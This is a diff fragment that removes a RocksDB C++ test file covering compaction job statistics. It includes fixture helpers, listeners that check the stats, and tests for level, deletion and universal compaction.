-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    Close();
-    Options options;
-    options.db_paths.emplace_back(dbname_, 0);
-    options.db_paths.emplace_back(dbname_ + "_2", 0);
-    options.db_paths.emplace_back(dbname_ + "_3", 0);
-    options.db_paths.emplace_back(dbname_ + "_4", 0);
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options) {
-    ColumnFamilyOptions cf_opts(options);
-    size_t cfi = handles_.size();
-    handles_.resize(cfi + cfs.size());
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-    }
-  }
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options) {
-    CreateColumnFamilies(cfs, options);
-    std::vector<std::string> cfs_plus_default = cfs;
-    cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-    ReopenWithColumnFamilies(cfs_plus_default, options);
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  Status TryReopenWithColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<Options>& options) {
-    Close();
-    EXPECT_EQ(cfs.size(), options.size());
-    std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-    }
-    DBOptions db_opts = DBOptions(options[0]);
-    return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options) {
-    Close();
-    std::vector<Options> v_opts(cfs.size(), options);
-    return TryReopenWithColumnFamilies(cfs, v_opts);
-  }
-
-  void Reopen(const Options& options) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      delete h;
-    }
-    handles_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(const Options& options) {
-    // Destroy using last options
-    Destroy(last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(const Options& options) {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, options));
-  }
-
-  Status ReadOnlyReopen(const Options& options) {
-    return DB::OpenForReadOnly(options, dbname_, &db_);
-  }
-
-  Status TryReopen(const Options& options) {
-    Close();
-    last_options_ = options;
-    return DB::Open(options, dbname_, &db_);
-  }
-
-  Status Flush(int cf = 0) {
-    if (cf == 0) {
-      return db_->Flush(FlushOptions());
-    } else {
-      return db_->Flush(FlushOptions(), handles_[cf]);
-    }
-  }
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, k, v);
-  }
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  Status Delete(int cf, const std::string& k) {
-    return db_->Delete(WriteOptions(), handles_[cf], k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  int NumTableFilesAtLevel(int level, int cf = 0) {
-    std::string property;
-    if (cf == 0) {
-      // default cfd
-      EXPECT_TRUE(db_->GetProperty(
-          "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    } else {
-      EXPECT_TRUE(db_->GetProperty(
-          handles_[cf], "rocksdb.num-files-at-level" + NumberToString(level),
-          &property));
-    }
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf = 0) {
-    int num_levels =
-        (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < num_levels; level++) {
-      int f = NumTableFilesAtLevel(level, cf);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-
-  uint64_t Size(const Slice& start, const Slice& limit, int cf = 0) {
-    Range r(start, limit);
-    uint64_t size;
-    if (cf == 0) {
-      db_->GetApproximateSizes(&r, 1, &size);
-    } else {
-      db_->GetApproximateSizes(handles_[1], &r, 1, &size);
-    }
-    return size;
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit,
-               uint32_t target_path_id) {
-    CompactRangeOptions compact_options;
-    compact_options.target_path_id = target_path_id;
-    ASSERT_OK(db_->CompactRange(compact_options, handles_[cf], &start, &limit));
-  }
-
-  void Compact(int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(
-        db_->CompactRange(CompactRangeOptions(), handles_[cf], &start, &limit));
-  }
-
-  void Compact(const Slice& start, const Slice& limit) {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &start, &limit));
-  }
-
-  void TEST_Compact(int level, int cf, const Slice& start, const Slice& limit) {
-    ASSERT_OK(dbfull()->TEST_CompactRange(level, &start, &limit, handles_[cf],
-                                          true /* disallow trivial move */));
-  }
-
-  // Do n memtable compactions, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int n, const std::string& small, const std::string& large,
-                  int cf = 0) {
-    for (int i = 0; i < n; i++) {
-      ASSERT_OK(Put(cf, small, "begin"));
-      ASSERT_OK(Put(cf, large, "end"));
-      ASSERT_OK(Flush(cf));
-    }
-  }
-
-  static void SetDeletionCompactionStats(
-      CompactionJobStats *stats, uint64_t input_deletions,
-      uint64_t expired_deletions, uint64_t records_replaced) {
-    stats->num_input_deletion_records = input_deletions;
-    stats->num_expired_deletion_records = expired_deletions;
-    stats->num_records_replaced = records_replaced;
-  }
-
-  void MakeTableWithKeyValues(
-    Random* rnd, uint64_t smallest, uint64_t largest,
-    int key_size, int value_size, uint64_t interval,
-    double ratio, int cf = 0) {
-    for (auto key = smallest; key < largest; key += interval) {
-      ASSERT_OK(Put(cf, Slice(Key(key, key_size)),
-                        Slice(RandomString(rnd, value_size, ratio))));
-    }
-    ASSERT_OK(Flush(cf));
-  }
-
-  // This function behaves with the implicit understanding that two
-  // rounds of keys are inserted into the database, as per the behavior
-  // of the DeletionStatsTest.
-  void SelectivelyDeleteKeys(uint64_t smallest, uint64_t largest,
-    uint64_t interval, int deletion_interval, int key_size,
-    uint64_t cutoff_key_num, CompactionJobStats* stats, int cf = 0) {
-
-    // interval needs to be >= 2 so that deletion entries can be inserted
-    // that are intended to not result in an actual key deletion by using
-    // an offset of 1 from another existing key
-    ASSERT_GE(interval, 2);
-
-    uint64_t ctr = 1;
-    uint32_t deletions_made = 0;
-    uint32_t num_deleted = 0;
-    uint32_t num_expired = 0;
-    for (auto key = smallest; key <= largest; key += interval, ctr++) {
-      if (ctr % deletion_interval == 0) {
-        ASSERT_OK(Delete(cf, Key(key, key_size)));
-        deletions_made++;
-        num_deleted++;
-
-        if (key > cutoff_key_num) {
-          num_expired++;
-        }
-      }
-    }
-
-    // Insert some deletions for keys that don't exist that
-    // are both in and out of the key range
-    ASSERT_OK(Delete(cf, Key(smallest+1, key_size)));
-    deletions_made++;
-
-    ASSERT_OK(Delete(cf, Key(smallest-1, key_size)));
-    deletions_made++;
-    num_expired++;
-
-    ASSERT_OK(Delete(cf, Key(smallest-9, key_size)));
-    deletions_made++;
-    num_expired++;
-
-    ASSERT_OK(Flush(cf));
-    SetDeletionCompactionStats(stats, deletions_made, num_expired,
-      num_deleted);
-  }
-};
-
-// An EventListener which helps verify the compaction results in
-// test CompactionJobStatsTest.
-class CompactionJobStatsChecker : public EventListener {
- public:
-  CompactionJobStatsChecker()
-      : compression_enabled_(false), verify_next_comp_io_stats_(false) {}
-
-  size_t NumberOfUnverifiedStats() { return expected_stats_.size(); }
-
-  void set_verify_next_comp_io_stats(bool v) { verify_next_comp_io_stats_ = v; }
-
-  // Once a compaction completed, this function will verify the returned
-  // CompactionJobInfo with the oldest CompactionJobInfo added earlier
-  // in "expected_stats_" which has not yet being used for verification.
-  virtual void OnCompactionCompleted(DB *db, const CompactionJobInfo& ci) {
-    if (verify_next_comp_io_stats_) {
-      ASSERT_GT(ci.stats.file_write_nanos, 0);
-      ASSERT_GT(ci.stats.file_range_sync_nanos, 0);
-      ASSERT_GT(ci.stats.file_fsync_nanos, 0);
-      ASSERT_GT(ci.stats.file_prepare_write_nanos, 0);
-      verify_next_comp_io_stats_ = false;
-    }
-
-    std::lock_guard<std::mutex> lock(mutex_);
-    if (expected_stats_.size()) {
-      Verify(ci.stats, expected_stats_.front());
-      expected_stats_.pop();
-    }
-  }
-
-  // A helper function which verifies whether two CompactionJobStats
-  // match.  The verification of all compaction stats are done by
-  // ASSERT_EQ except for the total input / output bytes, which we
-  // use ASSERT_GE and ASSERT_LE with a reasonable bias ---
-  // 10% in uncompressed case and 20% when compression is used.
-  virtual void Verify(const CompactionJobStats& current_stats,
-              const CompactionJobStats& stats) {
-    // time
-    ASSERT_GT(current_stats.elapsed_micros, 0U);
-
-    ASSERT_EQ(current_stats.num_input_records,
-        stats.num_input_records);
-    ASSERT_EQ(current_stats.num_input_files,
-        stats.num_input_files);
-    ASSERT_EQ(current_stats.num_input_files_at_output_level,
-        stats.num_input_files_at_output_level);
-
-    ASSERT_EQ(current_stats.num_output_records,
-        stats.num_output_records);
-    ASSERT_EQ(current_stats.num_output_files,
-        stats.num_output_files);
-
-    ASSERT_EQ(current_stats.is_manual_compaction,
-        stats.is_manual_compaction);
-
-    // file size
-    double kFileSizeBias = compression_enabled_ ? 0.20 : 0.10;
-    ASSERT_GE(current_stats.total_input_bytes * (1.00 + kFileSizeBias),
-              stats.total_input_bytes);
-    ASSERT_LE(current_stats.total_input_bytes,
-              stats.total_input_bytes * (1.00 + kFileSizeBias));
-    ASSERT_GE(current_stats.total_output_bytes * (1.00 + kFileSizeBias),
-              stats.total_output_bytes);
-    ASSERT_LE(current_stats.total_output_bytes,
-              stats.total_output_bytes * (1.00 + kFileSizeBias));
-    ASSERT_EQ(current_stats.total_input_raw_key_bytes,
-              stats.total_input_raw_key_bytes);
-    ASSERT_EQ(current_stats.total_input_raw_value_bytes,
-              stats.total_input_raw_value_bytes);
-
-    ASSERT_EQ(current_stats.num_records_replaced,
-        stats.num_records_replaced);
-
-    ASSERT_EQ(current_stats.num_corrupt_keys,
-        stats.num_corrupt_keys);
-
-    ASSERT_EQ(
-        std::string(current_stats.smallest_output_key_prefix),
-        std::string(stats.smallest_output_key_prefix));
-    ASSERT_EQ(
-        std::string(current_stats.largest_output_key_prefix),
-        std::string(stats.largest_output_key_prefix));
-  }
-
-  // Add an expected compaction stats, which will be used to
-  // verify the CompactionJobStats returned by the OnCompactionCompleted()
-  // callback.
-  void AddExpectedStats(const CompactionJobStats& stats) {
-    std::lock_guard<std::mutex> lock(mutex_);
-    expected_stats_.push(stats);
-  }
-
-  void EnableCompression(bool flag) {
-    compression_enabled_ = flag;
-  }
-
-  bool verify_next_comp_io_stats() const { return verify_next_comp_io_stats_; }
-
- private:
-  std::mutex mutex_;
-  std::queue<CompactionJobStats> expected_stats_;
-  bool compression_enabled_;
-  bool verify_next_comp_io_stats_;
-};
-
-// An EventListener which helps verify the compaction statistics in
-// the test DeletionStatsTest.
-class CompactionJobDeletionStatsChecker : public CompactionJobStatsChecker {
- public:
-  // Verifies whether two CompactionJobStats match.
-  void Verify(const CompactionJobStats& current_stats,
-              const CompactionJobStats& stats) {
-    ASSERT_EQ(
-      current_stats.num_input_deletion_records,
-      stats.num_input_deletion_records);
-    ASSERT_EQ(
-        current_stats.num_expired_deletion_records,
-        stats.num_expired_deletion_records);
-    ASSERT_EQ(
-        current_stats.num_records_replaced,
-        stats.num_records_replaced);
-
-    ASSERT_EQ(current_stats.num_corrupt_keys,
-        stats.num_corrupt_keys);
-  }
-};
-
-namespace {
-
-uint64_t EstimatedFileSize(
-    uint64_t num_records, size_t key_size, size_t value_size,
-    double compression_ratio = 1.0,
-    size_t block_size = 4096,
-    int bloom_bits_per_key = 10) {
-  const size_t kPerKeyOverhead = 8;
-  const size_t kFooterSize = 512;
-
-  uint64_t data_size =
-    static_cast<uint64_t>(
-      num_records * (key_size + value_size * compression_ratio +
-                     kPerKeyOverhead));
-
-  return data_size + kFooterSize
-         + num_records * bloom_bits_per_key / 8      // filter block
-         + data_size * (key_size + 8) / block_size;  // index block
-}
-
-namespace {
-
-void CopyPrefix(
-    const Slice& src, size_t prefix_length, std::string* dst) {
-  assert(prefix_length > 0);
-  size_t length = src.size() > prefix_length ? prefix_length : src.size();
-  dst->assign(src.data(), length);
-}
-
-}  // namespace
-
-CompactionJobStats NewManualCompactionJobStats(
-    const std::string& smallest_key, const std::string& largest_key,
-    size_t num_input_files, size_t num_input_files_at_output_level,
-    uint64_t num_input_records, size_t key_size, size_t value_size,
-    size_t num_output_files, uint64_t num_output_records,
-    double compression_ratio, uint64_t num_records_replaced,
-    bool is_manual = true) {
-  CompactionJobStats stats;
-  stats.Reset();
-
-  stats.num_input_records = num_input_records;
-  stats.num_input_files = num_input_files;
-  stats.num_input_files_at_output_level = num_input_files_at_output_level;
-
-  stats.num_output_records = num_output_records;
-  stats.num_output_files = num_output_files;
-
-  stats.total_input_bytes =
-      EstimatedFileSize(
-          num_input_records / num_input_files,
-          key_size, value_size, compression_ratio) * num_input_files;
-  stats.total_output_bytes =
-      EstimatedFileSize(
-          num_output_records / num_output_files,
-          key_size, value_size, compression_ratio) * num_output_files;
-  stats.total_input_raw_key_bytes =
-      num_input_records * (key_size + 8);
-  stats.total_input_raw_value_bytes =
-      num_input_records * value_size;
-
-  stats.is_manual_compaction = is_manual;
-
-  stats.num_records_replaced = num_records_replaced;
-
-  CopyPrefix(smallest_key,
-             CompactionJobStats::kMaxPrefixLength,
-             &stats.smallest_output_key_prefix);
-  CopyPrefix(largest_key,
-             CompactionJobStats::kMaxPrefixLength,
-             &stats.largest_output_key_prefix);
-
-  return stats;
-}
-
-CompressionType GetAnyCompression() {
-  if (Snappy_Supported()) {
-    return kSnappyCompression;
-  } else if (Zlib_Supported()) {
-    return kZlibCompression;
-  } else if (BZip2_Supported()) {
-    return kBZip2Compression;
-  } else if (LZ4_Supported()) {
-    return kLZ4Compression;
-  } else if (XPRESS_Supported()) {
-    return kXpressCompression;
-  }
-
-  return kNoCompression;
-}
-
-}  // namespace
-
-TEST_P(CompactionJobStatsTest, CompactionJobStatsTest) {
-  Random rnd(301);
-  const int kBufSize = 100;
-  char buf[kBufSize];
-  uint64_t key_base = 100000000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_L0_file = 100;
-  const int kTestScale = 8;
-  const int kKeySize = 10;
-  const int kValueSize = 1000;
-  const double kCompressionRatio = 0.5;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_L0_file;
-
-  // Whenever a compaction completes, this listener will try to
-  // verify whether the returned CompactionJobStats matches
-  // what we expect.  The expected CompactionJobStats is added
-  // via AddExpectedStats().
-  auto* stats_checker = new CompactionJobStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  // just enough setting to hold off auto-compaction.
-  options.level0_file_num_compaction_trigger = kTestScale + 1;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.max_subcompactions = max_subcompactions_;
-  options.bytes_per_sync = 512 * 1024;
-
-  options.report_bg_io_stats = true;
-  for (int test = 0; test < 2; ++test) {
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // 1st Phase: generate "num_L0_files" L0 files.
-    int num_L0_files = 0;
-    for (uint64_t start_key = key_base;
-                  start_key <= key_base * kTestScale;
-                  start_key += key_base) {
-      MakeTableWithKeyValues(
-          &rnd, start_key, start_key + key_base - 1,
-          kKeySize, kValueSize, key_interval,
-          compression_ratio, 1);
-      snprintf(buf, kBufSize, "%d", ++num_L0_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-    ASSERT_EQ(ToString(num_L0_files), FilesPerLevel(1));
-
-    // 2nd Phase: perform L0 -> L1 compaction.
-    int L0_compaction_count = 6;
-    int count = 1;
-    std::string smallest_key;
-    std::string largest_key;
-    for (uint64_t start_key = key_base;
-         start_key <= key_base * L0_compaction_count;
-         start_key += key_base, count++) {
-      smallest_key = Key(start_key, 10);
-      largest_key = Key(start_key + key_base - key_interval, 10);
-      stats_checker->AddExpectedStats(
-          NewManualCompactionJobStats(
-              smallest_key, largest_key,
-              1, 0, num_keys_per_L0_file,
-              kKeySize, kValueSize,
-              1, num_keys_per_L0_file,
-              compression_ratio, 0));
-      ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-      TEST_Compact(0, 1, smallest_key, largest_key);
-      snprintf(buf, kBufSize, "%d,%d", num_L0_files - count, count);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // compact two files into one in the last L0 -> L1 compaction
-    int num_remaining_L0 = num_L0_files - L0_compaction_count;
-    smallest_key = Key(key_base * (L0_compaction_count + 1), 10);
-    largest_key = Key(key_base * (kTestScale + 1) - key_interval, 10);
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            smallest_key, largest_key,
-            num_remaining_L0,
-            0, num_keys_per_L0_file * num_remaining_L0,
-            kKeySize, kValueSize,
-            1, num_keys_per_L0_file * num_remaining_L0,
-            compression_ratio, 0));
-    ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-    TEST_Compact(0, 1, smallest_key, largest_key);
-
-    int num_L1_files = num_L0_files - num_remaining_L0 + 1;
-    num_L0_files = 0;
-    snprintf(buf, kBufSize, "%d,%d", num_L0_files, num_L1_files);
-    ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-
-    // 3rd Phase: generate sparse L0 files (wider key-range, same num of keys)
-    int sparseness = 2;
-    for (uint64_t start_key = key_base;
-                  start_key <= key_base * kTestScale;
-                  start_key += key_base * sparseness) {
-      MakeTableWithKeyValues(
-          &rnd, start_key, start_key + key_base * sparseness - 1,
-          kKeySize, kValueSize,
-          key_base * sparseness / num_keys_per_L0_file,
-          compression_ratio, 1);
-      snprintf(buf, kBufSize, "%d,%d", ++num_L0_files, num_L1_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // 4th Phase: perform L0 -> L1 compaction again, expect higher write amp
-    // When subcompactions are enabled, the number of output files increases
-    // by 1 because multiple threads are consuming the input and generating
-    // output files without coordinating to see if the output could fit into
-    // a smaller number of files like it does when it runs sequentially
-    int num_output_files = options.max_subcompactions > 1 ? 2 : 1;
-    for (uint64_t start_key = key_base;
-         num_L0_files > 1;
-         start_key += key_base * sparseness) {
-      smallest_key = Key(start_key, 10);
-      largest_key =
-          Key(start_key + key_base * sparseness - key_interval, 10);
-      stats_checker->AddExpectedStats(
-          NewManualCompactionJobStats(
-              smallest_key, largest_key,
-              3, 2, num_keys_per_L0_file * 3,
-              kKeySize, kValueSize,
-              num_output_files,
-              num_keys_per_L0_file * 2,  // 1/3 of the data will be updated.
-              compression_ratio,
-              num_keys_per_L0_file));
-      ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-      Compact(1, smallest_key, largest_key);
-      if (options.max_subcompactions == 1) {
-        --num_L1_files;
-      }
-      snprintf(buf, kBufSize, "%d,%d", --num_L0_files, num_L1_files);
-      ASSERT_EQ(std::string(buf), FilesPerLevel(1));
-    }
-
-    // 5th Phase: Do a full compaction, which involves in two sub-compactions.
-    // Here we expect to have 1 L0 files and 4 L1 files
-    // In the first sub-compaction, we expect L0 compaction.
-    smallest_key = Key(key_base, 10);
-    largest_key = Key(key_base * (kTestScale + 1) - key_interval, 10);
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            Key(key_base * (kTestScale + 1 - sparseness), 10), largest_key,
-            2, 1, num_keys_per_L0_file * 3,
-            kKeySize, kValueSize,
-            1, num_keys_per_L0_file * 2,
-            compression_ratio,
-            num_keys_per_L0_file));
-    ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 1U);
-    Compact(1, smallest_key, largest_key);
-
-    num_L1_files = options.max_subcompactions > 1 ? 7 : 4;
-    char L1_buf[4];
-    snprintf(L1_buf, sizeof(L1_buf), "0,%d", num_L1_files);
-    std::string L1_files(L1_buf);
-    ASSERT_EQ(L1_files, FilesPerLevel(1));
-    options.compression = GetAnyCompression();
-    if (options.compression == kNoCompression) {
-      break;
-    }
-    stats_checker->EnableCompression(true);
-    compression_ratio = kCompressionRatio;
-
-    for (int i = 0; i < 5; i++) {
-      ASSERT_OK(Put(1, Slice(Key(key_base + i, 10)),
-                    Slice(RandomString(&rnd, 512 * 1024, 1))));
-    }
-
-    ASSERT_OK(Flush(1));
-    reinterpret_cast<DBImpl*>(db_)->TEST_WaitForCompact();
-
-    stats_checker->set_verify_next_comp_io_stats(true);
-    std::atomic<bool> first_prepare_write(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Append:BeforePrepareWrite", [&](void* arg) {
-          if (first_prepare_write.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_prepare_write.store(false);
-          }
-        });
-
-    std::atomic<bool> first_flush(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::Flush:BeforeAppend", [&](void* arg) {
-          if (first_flush.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_flush.store(false);
-          }
-        });
-
-    std::atomic<bool> first_sync(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::SyncInternal:0", [&](void* arg) {
-          if (first_sync.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_sync.store(false);
-          }
-        });
-
-    std::atomic<bool> first_range_sync(true);
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "WritableFileWriter::RangeSync:0", [&](void* arg) {
-          if (first_range_sync.load()) {
-            options.env->SleepForMicroseconds(3);
-            first_range_sync.store(false);
-          }
-        });
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    Compact(1, smallest_key, largest_key);
-
-    ASSERT_TRUE(!stats_checker->verify_next_comp_io_stats());
-    ASSERT_TRUE(!first_prepare_write.load());
-    ASSERT_TRUE(!first_flush.load());
-    ASSERT_TRUE(!first_sync.load());
-    ASSERT_TRUE(!first_range_sync.load());
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 0U);
-}
-
-TEST_P(CompactionJobStatsTest, DeletionStatsTest) {
-  Random rnd(301);
-  uint64_t key_base = 100000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_L0_file = 20;
-  const int kTestScale = 8;  // make sure this is even
-  const int kKeySize = 10;
-  const int kValueSize = 100;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_L0_file;
-  uint64_t largest_key_num = key_base * (kTestScale + 1) - key_interval;
-  uint64_t cutoff_key_num = key_base * (kTestScale / 2 + 1) - key_interval;
-  const std::string smallest_key = Key(key_base - 10, kKeySize);
-  const std::string largest_key = Key(largest_key_num + 10, kKeySize);
-
-  // Whenever a compaction completes, this listener will try to
-  // verify whether the returned CompactionJobStats matches
-  // what we expect.
-  auto* stats_checker = new CompactionJobDeletionStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = kTestScale+1;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Stage 1: Generate several L0 files and then send them to L2 by
-  // using CompactRangeOptions and CompactRange(). These files will
-  // have a strict subset of the keys from the full key-range
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale / 2;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-  }
-
-  CompactRangeOptions cr_options;
-  cr_options.change_level = true;
-  cr_options.target_level = 2;
-  db_->CompactRange(cr_options, handles_[1], nullptr, nullptr);
-  ASSERT_GT(NumTableFilesAtLevel(2, 1), 0);
-
-  // Stage 2: Generate files including keys from the entire key range
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-  }
-
-  // Send these L0 files to L1
-  TEST_Compact(0, 1, smallest_key, largest_key);
-  ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-
-  // Add a new record and flush so now there is a L0 file
-  // with a value too (not just deletions from the next step)
-  ASSERT_OK(Put(1, Key(key_base-6, kKeySize), "test"));
-  ASSERT_OK(Flush(1));
-
-  // Stage 3: Generate L0 files with some deletions so now
-  // there are files with the same key range in L0, L1, and L2
-  int deletion_interval = 3;
-  CompactionJobStats first_compaction_stats;
-  SelectivelyDeleteKeys(key_base, largest_key_num,
-      key_interval, deletion_interval, kKeySize, cutoff_key_num,
-      &first_compaction_stats, 1);
-
-  stats_checker->AddExpectedStats(first_compaction_stats);
-
-  // Stage 4: Trigger compaction and verify the stats
-  TEST_Compact(0, 1, smallest_key, largest_key);
-}
-
-namespace {
-int GetUniversalCompactionInputUnits(uint32_t num_flushes) {
-  uint32_t compaction_input_units;
-  for (compaction_input_units = 1;
-       num_flushes >= compaction_input_units;
-       compaction_input_units *= 2) {
-    if ((num_flushes & compaction_input_units) != 0) {
-      return compaction_input_units > 1 ? compaction_input_units : 0;
-    }
-  }
-  return 0;
-}
-}  // namespace
-
-TEST_P(CompactionJobStatsTest, UniversalCompactionTest) {
-  Random rnd(301);
-  uint64_t key_base = 100000000l;
-  // Note: key_base must be multiple of num_keys_per_L0_file
-  int num_keys_per_table = 100;
-  const uint32_t kTestScale = 6;
-  const int kKeySize = 10;
-  const int kValueSize = 900;
-  double compression_ratio = 1.0;
-  uint64_t key_interval = key_base / num_keys_per_table;
-
-  auto* stats_checker = new CompactionJobStatsChecker();
-  Options options;
-  options.listeners.emplace_back(stats_checker);
-  options.create_if_missing = true;
-  options.num_levels = 3;
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = num_keys_per_table * 1000;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 1;
-  options.compaction_options_universal.max_size_amplification_percent = 1000;
-  options.max_subcompactions = max_subcompactions_;
-
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Generates the expected CompactionJobStats for each compaction
-  for (uint32_t num_flushes = 2; num_flushes <= kTestScale; num_flushes++) {
-    // Here we treat one newly flushed file as an unit.
-    //
-    // For example, if a newly flushed file is 100k, and a compaction has
-    // 4 input units, then this compaction inputs 400k.
-    uint32_t num_input_units = GetUniversalCompactionInputUnits(num_flushes);
-    if (num_input_units == 0) {
-      continue;
-    }
-    // The following statement determines the expected smallest key
-    // based on whether it is a full compaction.  A full compaction only
-    // happens when the number of flushes equals to the number of compaction
-    // input runs.
-    uint64_t smallest_key =
-        (num_flushes == num_input_units) ?
-            key_base : key_base * (num_flushes - 1);
-
-    stats_checker->AddExpectedStats(
-        NewManualCompactionJobStats(
-            Key(smallest_key, 10),
-            Key(smallest_key + key_base * num_input_units - key_interval, 10),
-            num_input_units,
-            num_input_units > 2 ? num_input_units / 2 : 0,
-            num_keys_per_table * num_input_units,
-            kKeySize, kValueSize,
-            num_input_units,
-            num_keys_per_table * num_input_units,
-            1.0, 0, false));
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 3U);
-
-  for (uint64_t start_key = key_base;
-                start_key <= key_base * kTestScale;
-                start_key += key_base) {
-    MakeTableWithKeyValues(
-        &rnd, start_key, start_key + key_base - 1,
-        kKeySize, kValueSize, key_interval,
-        compression_ratio, 1);
-    reinterpret_cast<DBImpl*>(db_)->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(stats_checker->NumberOfUnverifiedStats(), 0U);
-}
-
-INSTANTIATE_TEST_CASE_P(CompactionJobStatsTest, CompactionJobStatsTest,
-                        ::testing::Values(1, 4));
-}  // namespace rocksdb
-
